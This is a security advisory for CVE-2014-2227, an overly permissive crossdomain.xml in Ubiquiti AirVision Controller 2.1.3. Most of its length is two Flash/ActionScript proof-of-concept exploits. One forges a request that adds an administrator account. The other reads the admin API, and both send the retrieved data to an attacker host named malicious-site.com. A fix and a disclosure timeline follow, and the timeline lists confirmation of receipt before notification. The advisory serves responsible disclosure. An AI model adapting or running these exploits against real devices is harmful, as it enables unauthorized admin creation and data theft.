----------- Vendor: ----------- Ubiquiti Networks (http://www.ubnt.com/) ---------------------------------------------- Affected Products/Versions: ---------------------------------------------- AirVision Controller v2.1.3 Note: Previous versions may be affected ----------------- Description: ----------------- Title: Overly Permissive default crossdomain.xml file CVE: CVE-2014-2227 CWE: http://cwe.mitre.org/data/definitions/264.html Detailed writeup: http://sethsec.blogspot.com/2014/07/cve-2014-2227.html Researcher: Seth Art - @sethsec ------------------------------------------------------------------------------------------------------ POC #1: Using crossdomain.xml to execute CSRF and add an administrator: ------------------------------------------------------------------------------------------------------ // Customized AirVision POC Author: Seth Art (sethsec at gmail.com) // POC Template Author: Gursev Singh Kalra (gursev.kalra at foundstone.com) // POC Template Author's github: (https://github.com/gursev/flash-xdomain-xploit) package { import flash.display.Sprite; import flash.events.*; import flash.net.URLRequestMethod; import flash.net.URLRequest; import flash.net.URLLoader; import flash.net.URLRequestHeader; public class XDomainXploit3 extends Sprite { public function XDomainXploit3() { // Target URL from where the data is to be retrieved var readFrom:String = "https//victim:7443/api/2.0/admin"; var header:URLRequestHeader = new URLRequestHeader("Content-Type", "text/plain; charset=UTF-8"); var readRequest:URLRequest = new URLRequest(readFrom); readRequest.method = URLRequestMethod.POST readRequest.data = "{\"name\":\"csrf-cdp\",\"email\":\"csrf-cdp@gmail.com\",\"userGroup\":\"admin\",\"x_password\":\"password\",\"confirmPassword\":\"password\",\"disabled\":false}"; readRequest.requestHeaders.push(header); var getLoader:URLLoader = new URLLoader(); getLoader.addEventListener(Event.COMPLETE, eventHandler); try { getLoader.load(readRequest); } catch 
(error:Error) { trace("Error loading URL: " + error); } } private function eventHandler(event:Event):void { // URL to which retrieved data is to be sent var sendTo:String = "http://www.malicious-site.com/crossdomain/store.php" var sendRequest:URLRequest = new URLRequest(sendTo); sendRequest.method = URLRequestMethod.POST; sendRequest.data = event.target.data; var sendLoader:URLLoader = new URLLoader(); try { sendLoader.load(sendRequest); } catch (error:Error) { trace("Error loading URL: " + error); } } } } ----------------------------------------------------------------------- POC #2: Using crossdomain.xml to exfiltrate log data: ----------------------------------------------------------------------- // Customized AirVision POC Author: Seth Art (sethsec at gmail.com) // POC Template Author: Gursev Singh Kalra (gursev.kalra at foundstone.com) // POC Template Author's github: (https://github.com/gursev/flash-xdomain-xploit) package { import flash.display.Sprite; import flash.events.*; import flash.net.URLRequestMethod; import flash.net.URLRequest; import flash.net.URLLoader; public class XDomainXploit extends Sprite { public function XDomainXploit() { // Target URL from where the data is to be retrieved var readFrom:String = "/victim:7443/api/2.0/admin"; var readRequest:URLRequest = new URLRequest(readFrom); var getLoader:URLLoader = new URLLoader(); getLoader.addEventListener(Event.COMPLETE, eventHandler); try { getLoader.load(readRequest); } catch (error:Error) { trace("Error loading URL: " + error); } } private function eventHandler(event:Event):void { // URL to which retrieved data is to be sent var sendTo:String = "http://www.malicious-site.com/admin" var sendRequest:URLRequest = new URLRequest(sendTo); sendRequest.method = URLRequestMethod.POST; sendRequest.data = event.target.data; var sendLoader:URLLoader = new URLLoader(); try { sendLoader.load(sendRequest); } catch (error:Error) { trace("Error loading URL: " + error); } } } } ------------- Solution: 
------------- AirVision Controller: upgrade to UniFi Video v3.0.1 or later (note: the application was renamed from AirVision to UniFi Video) ----------------------------- Disclosure Timeline: ----------------------------- 2014-02-25: Notified Ubiquiti of the crossdomain.xml vulnerability in the AirVision product 2014-02-19: Ubiquiti confirms receipt of the AirVision report and the existence of the vulnerability 2014-02-28: CVE-2014-2227 assigned 2014-03-12: Requested status update 2014-03-27: Requested status update 2014-04-07: Requested status update 2014-04-09: Ubiquiti provides a timeline for the solution 2014-04-18: UniFi Video 3.0.1 is released 2014-06-13: Public disclosure date set to 2014-07-24 2014-07-24: Public disclosure